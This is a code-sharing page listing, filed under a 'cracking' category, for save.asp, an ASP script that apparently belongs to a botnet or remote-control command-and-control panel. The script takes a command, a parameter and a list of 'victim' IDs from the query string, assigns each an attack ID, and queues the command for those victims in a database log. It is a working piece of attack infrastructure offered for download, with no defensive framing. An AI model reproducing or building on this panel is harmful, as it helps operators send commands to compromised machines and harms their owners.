save.asp
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:1k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <%
  2. '// Save Commands
  3. '//HISTORY
  4. '10/08/2006
  5. ' - Started
  6. %>
  7. <!--#include file="db.asp" -->
  8. <%
  9. protected()
  10. Dim Command, Param, AttackID, VictimID
  11. Command = Request.Querystring("c")
  12. Param = Request.Querystring("p")
  13. Dim Victims
  14. Victims = Split(Request.Querystring("v"), ",")
  15. Dim i
  16. Dim values(8)
  17. For i = 0 To Ubound(Victims)
  18. VictimID = fm_NStr(Victims(i))
  19. AttackID = fm_RndNumeric2
  20. ' Error / missing data
  21. If AttackID = 0 Or VictimID = 0 Then 
  22. Response.Write NON_ERROR
  23. Response.End
  24. End If
  25. Dim RawCommand
  26. RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
  27. 'Log
  28. values(0) = "Command"
  29. values(1) = RawCommand
  30. values(2) = "text"
  31. values(3) = "AttackID"
  32. values(4) = AttackID
  33. values(5) = "text"
  34. values(6) = "VictimID"
  35. values(7) = VictimID
  36. values(8) = "number"
  37. fm_Insert "Log", values
  38. Next
  39. Response.Write SUCCESS
  40. %>